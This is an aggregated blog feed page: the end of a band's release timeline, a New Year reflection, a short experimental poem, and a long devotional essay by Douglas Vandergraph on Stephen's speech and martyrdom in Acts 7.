* 08/2022 – All releases except The Hex Sessions & The Envy Sessions change distributors to DistroKid
* 03/2023 – Plans to remaster Arete start
* 05–08/2023 – Arete remastered and planned as an LP release on CD, vinyl, and streaming
* 08/13/2023 – “The Hex Sessions” & “The Envy Sessions” vinyl & CD pre-order launches
* 10/11/2023 – Vinyl & CD pre-order ends and is released
* 11/17/2023 – Arete “Remastered” released on streaming
* 12/2023 – 06/2024 – Hiatus

Era III
* 7/2024 – Present | Stages of the new album begin, from concept to release
* 12/2025 | Relocate studio to an undisclosed location; only a select few to know the location. Work on new album commences.
from
Have A Good Day
I love the start of a new year. It gives you the illusion of a clean slate, and often that’s all you need to make changes and start new things. It’s not about life-changing resolutions; it’s about saying that this will be the best year ever and believing in it, at least for a while.
from sun scriptorium
reaching as ever —long, iridescent lance unbroken a touch hackled mist in stillness, ever as[ ] what branches dance when emptied a sigh awake with frost —!
dreaming as ever —known, starsweet voice of pause a kiss pressed petal in silence, ever as[ ] what wounds bank when placed a forge tendered rending —?
shaping as ever —current, glyphstave knife unknown a root carved prayer in singing, ever as[ ] what sap inks when vined a word spun orbiting moons —;
[#2025dec the 31, #fragment]
from Douglas Vandergraph
Acts 7 is not a gentle chapter. It is not devotional in the soft sense. It is not designed to make anyone feel affirmed in what they already believe. Acts 7 is a collision. It is the longest speech in the book of Acts, and it is delivered by a man who knows he will not walk away once he finishes speaking. Stephen is not defending himself in order to survive. He is testifying in order to be faithful. That distinction changes everything about how this chapter must be read.
Most people remember Acts 7 as the chapter where Stephen is stoned. That memory, while accurate, misses the deeper shock of the chapter. The execution is not the climax. The sermon is. Stephen’s death is the consequence, not the point. The point is that he tells the truth in a room that has already decided what truth is allowed to sound like. Acts 7 is not about martyrdom as spectacle. It is about what happens when a faithful retelling of God’s story exposes the danger of religious certainty without humility.
Stephen stands before the Sanhedrin, the same religious authority that condemned Jesus. He is accused of speaking against Moses, the law, and the temple. In other words, he is accused of being dangerous to tradition. His response is not to deny the charge in the way they expect. Instead, he does something far more unsettling. He tells their own story back to them, but he tells it honestly.
From the first sentence of his speech, Stephen takes control of the narrative. He begins with Abraham, not Moses. That alone is significant. He reminds them that God called Abraham while he was still in Mesopotamia, before the promised land, before circumcision, before the law, before the temple. The implication is quiet but devastating. God was moving long before your structures existed. God was speaking long before your systems were in place. God’s faithfulness does not begin with your institutions.
Stephen’s retelling of Israel’s history is not a history lesson for beginners. His audience knows these stories intimately. That is precisely why his approach is so dangerous. He is not introducing new facts. He is re-framing familiar ones. He highlights patterns that are uncomfortable to acknowledge. Over and over again, he emphasizes how God initiates and people resist. God sends deliverers, and they are rejected. God speaks through unexpected voices, and those voices are ignored or opposed. God moves ahead of the people, and the people cling to what feels safe.
Abraham leaves. Joseph is betrayed by his brothers. Moses is rejected by the very people he is sent to save. The pattern is not accidental. Stephen is building toward something, and his listeners can feel it. Every example tightens the room. Every story removes another layer of insulation between their self-image and the truth.
What makes Stephen’s speech so powerful is not anger. It is clarity. He does not shout. He does not insult until the end. He lets the story itself do the work. He shows that Israel’s history is not a straight line of obedience but a complicated relationship with a faithful God and a resistant people. This is not an attack on Israel. It is a refusal to romanticize the past in order to protect the present.
When Stephen speaks about Moses, the tension becomes unmistakable. Moses is the hero of the law, the deliverer, the lawgiver. Stephen honors Moses deeply, but he also tells the parts of the story that are often softened. He reminds them that Moses was rejected the first time he tried to intervene. “Who made you a ruler and judge over us?” they asked. Stephen does not skip that line. He underlines it with history. The deliverer was rejected before he was accepted. The savior was misunderstood before he was followed.
The parallels to Jesus are obvious, but Stephen does not even need to name them yet. The pattern speaks for itself. God’s messengers are rarely welcomed by the people who believe they are most faithful. Deliverance does not arrive in the form people expect, and when it does not, it is often resisted.
Stephen also dismantles the idea that God’s presence is confined to sacred spaces. He reminds them that God appeared to Moses in the wilderness, in Midian, in a burning bush far from Jerusalem. The holy ground was not defined by architecture but by God’s presence. This is a direct challenge to temple-centered faith. Not because the temple is evil, but because it has been elevated beyond its purpose.
By the time Stephen reaches the golden calf, the air is thick. He points out that while Moses was receiving living words from God, the people were crafting an idol. They wanted something visible, manageable, controllable. This is not ancient history. It is a diagnosis. People prefer gods they can predict over a God who speaks and disrupts.
Stephen’s speech is relentless in its honesty, but it is also deeply rooted in Scripture. He is not rejecting the story of Israel. He is insisting that the story be told fully. He refuses to let selective memory become a substitute for faithfulness. This is why Acts 7 still matters so much. It exposes the danger of knowing the Bible well enough to quote it but not well enough to let it confront us.
The turning point of the speech comes near the end, when Stephen finally names the pattern explicitly. He says what the stories have been implying all along. “You stiff-necked people,” he says, “uncircumcised in heart and ears, you always resist the Holy Spirit.” This is the moment when the room explodes internally. Up until now, Stephen has been narrating history. Now he is interpreting it. And in doing so, he collapses the distance between past and present.
Stephen does not accuse them of being worse than their ancestors. He accuses them of being the same. That is far more threatening. If they were worse, they could dismiss him as exaggerated. If they were different, they could reassure themselves that they had learned. But if they are the same, then everything is at risk.
He goes even further. He accuses them of betraying and murdering the Righteous One. The implication is unmistakable. The pattern has continued. The prophets were persecuted. The deliverers were rejected. And now, the Messiah has been killed by those who believed they were defending God.
This is not blasphemy. It is prophecy. It is also why Stephen cannot survive this speech. The Sanhedrin does not need more evidence. They are not interested in dialogue. They are enraged because Stephen has stripped away their moral insulation. He has exposed the possibility that religious certainty can coexist with resistance to God.
Stephen’s vision of Jesus standing at the right hand of God is not a triumphant escape. It is a confirmation. He sees Jesus not seated, but standing. As if to welcome him. As if to bear witness to his faithfulness. As if to affirm that telling the truth, even when it costs everything, is not wasted.
What follows is brutal. Stephen is dragged outside the city and stoned. But even in his death, his words continue. He echoes Jesus, praying for forgiveness for those who are killing him. This is not weakness. It is alignment. Stephen dies as he lived, fully conformed to the pattern of Christ.
Acts 7 forces uncomfortable questions. Not about history, but about us. Do we love God’s story, or do we love our version of it? Are we open to the possibility that God may move beyond the structures we have built to honor Him? Do we recognize the danger of confusing tradition with obedience?
Stephen’s speech is not preserved in Scripture because it is eloquent, though it is. It is preserved because it reveals something essential about faith. Faith is not proven by how fiercely we defend what we have inherited. Faith is revealed by how willing we are to follow God when He moves in ways that unsettle us.
Acts 7 reminds us that it is possible to know Scripture and still resist the Spirit. It is possible to defend God and still oppose His work. It is possible to honor the past while missing the present. Stephen did not die because he hated Israel. He died because he loved God’s truth more than his own safety.
This chapter refuses to let us remain comfortable readers. It asks whether we are listening to God or merely protecting our assumptions. It challenges us to examine whether our faith is alive and responsive, or carefully preserved and untouchable.
In the next part, we will look more closely at why Stephen’s retelling of history was so threatening, how Acts 7 reshapes the way we understand religious authority, and what this chapter demands from anyone who claims to follow Jesus today.
Stephen’s speech becomes even more unsettling the longer you sit with it, because Acts 7 is not merely an indictment of ancient leaders. It is a mirror held up to every generation that believes it has finally arrived at religious maturity. What makes this chapter endure is not that it exposes corruption in someone else, long ago, but that it quietly asks whether we would have stood with Stephen or stood with the stones.
One of the most overlooked aspects of Acts 7 is that Stephen never once argues for novelty. He is not presenting a new religion. He is not discarding Moses. He is not rejecting the law. He is insisting that God has always been bigger than the containers built to hold Him. That distinction matters, because religious resistance rarely announces itself as rebellion. It almost always disguises itself as faithfulness.
Stephen shows that the people he is addressing did not wake up one day intending to oppose God. They believed they were guarding something sacred. That is the danger. The greatest threat to living faith is not open hostility. It is settled certainty. It is the belief that God has already spoken fully and finally in ways that require no further listening.
This is why Stephen spends so much time emphasizing movement. Abraham moves. Joseph is moved. Moses flees and returns. Israel wanders. God’s presence appears in unexpected places. Acts 7 is a story in motion. The Sanhedrin, by contrast, represents fixity. Authority rooted in location. Power anchored to place. Truth tied to structure. Stephen’s crime is not doctrinal error. It is reminding them that God does not stay where He is put.
The temple looms large in this conflict. For the leaders, the temple is the ultimate symbol of God’s nearness. For Stephen, the temple has become a test case. Not because it is false, but because it has been absolutized. When something meant to point to God becomes the thing we defend most fiercely, it has quietly taken God’s place.
Stephen quotes the prophets to make this point unmistakable. “Heaven is my throne, and the earth is my footstool,” God says. “What kind of house will you build for me?” This is not anti-worship. It is anti-control. God is reminding His people that He cannot be contained, domesticated, or owned. Any attempt to do so, no matter how sincere, risks becoming idolatry.
This is where Acts 7 cuts deeply into modern faith as well. It challenges the assumption that longevity equals correctness. It confronts the idea that tradition automatically confers authority. Stephen does not deny the value of what came before. He denies the right of any generation to freeze God’s movement in time.
Stephen’s accusation that they “resist the Holy Spirit” is one of the most sobering phrases in the New Testament. Resistance to the Spirit is not framed here as moral failure. It is framed as spiritual rigidity. The inability to recognize God’s voice when it speaks differently than expected. The refusal to follow when obedience threatens identity.
What makes this resistance so tragic is that it is consistent. Stephen points out that their ancestors persecuted the prophets. Now they have murdered the Righteous One. The problem is not ignorance. It is pattern. And patterns, once exposed, are difficult to deny.
This is why the reaction is so violent. Truth that indicts behavior can be debated. Truth that exposes identity is unbearable. Stephen does not simply accuse them of doing something wrong. He tells them who they are becoming. He tells them they have aligned themselves with the very forces they believe they oppose.
Acts 7 also forces us to rethink courage. Stephen’s boldness is not reckless. It is rooted. He speaks as someone who knows the story so well that he cannot lie about it to save himself. His courage flows from coherence. His faith is not compartmentalized. It is integrated. What he believes, he lives. What he teaches, he embodies.
Stephen’s vision of Jesus standing at God’s right hand is not incidental. In Jewish imagery, a seated figure signifies completed work. A standing figure signifies advocacy or readiness. Stephen sees Jesus as one who stands to receive him, to testify on his behalf, to affirm that his life and death are not meaningless. This vision reframes martyrdom. Stephen is not abandoned. He is accompanied.
The presence of Saul at Stephen’s execution is another detail loaded with significance. Saul is introduced not as a villain, but as a witness. He watches. He approves. And later, he will become Paul. Acts 7 is not only about judgment. It is about seed. Stephen’s faithfulness plants something that will later explode into the Gentile mission. God is already at work beyond the moment of violence.
This reminds us that obedience does not always look successful in the moment. Stephen does not see the fruit of his witness. He does not get to watch Saul’s conversion. He does not get to participate in the church’s expansion. Faithfulness is not rewarded with immediate validation. Sometimes it is simply received by God and planted in ways we will never see.
Acts 7 challenges the metrics by which we measure impact. Stephen’s ministry appears short, interrupted, cut off. Yet his words echo through the rest of Acts. His theology shapes the church’s understanding of mission. His death accelerates the scattering of believers, which spreads the gospel further. What looks like defeat becomes multiplication.
This chapter also forces a painful self-examination. Would we recognize God if He spoke outside our preferred frameworks? Would we follow truth if it threatened our belonging? Would we listen to a voice like Stephen’s, or would we label it dangerous, divisive, or unfaithful?
Acts 7 does not allow us to remain neutral. It demands that we decide whether faith is primarily about preserving what we have received or responding to what God is doing now. It exposes the cost of telling the truth in systems that reward compliance over courage.
Stephen’s final prayer is perhaps the most haunting element of the chapter. He does not curse his killers. He does not demand justice. He entrusts himself to God and asks forgiveness for those who are killing him. This is not spiritual performance. It is the fruit of a life shaped by Jesus. In that moment, Stephen becomes a living echo of the cross.
Acts 7 leaves us with no neat conclusions. It ends with blood on the ground and witnesses walking away. And yet, it also leaves us with hope. God is not finished. The story is still moving. The Spirit is not contained.
This chapter reminds us that faithfulness may cost more than we want to pay, but it also assures us that obedience is never wasted. Stephen’s voice was silenced, but his truth was not. It continues to speak, unsettling comfortable faith and calling believers back to a living, listening, courageous trust in God.
Acts 7 stands as a warning and an invitation. A warning against mistaking tradition for truth. An invitation to follow God wherever He leads, even when the path is dangerous, misunderstood, or costly. It calls us to be people who know the story well enough to tell it honestly, even when honesty is the very thing that threatens us.
Stephen did not shatter the room because he was loud. He shattered it because he was faithful. And that kind of faith still disrupts everything it touches.
Your friend, Douglas Vandergraph
Watch Douglas Vandergraph’s inspiring faith-based videos on YouTube
Support the ministry by buying Douglas a coffee
#Acts7 #Stephen #BibleStudy #FaithAndCourage #ChristianWriting #NewTestament #Martyrdom #HolySpirit #TruthOverComfort
2025 is leaving for good and I look forward to 2026. Let’s spend the last day with family and friends, be optimistic, and handle all our problems the best we can. Finally, let’s all continue writing. Happy New Year, everyone!
#happynewyear #goodbye2025 #hello2026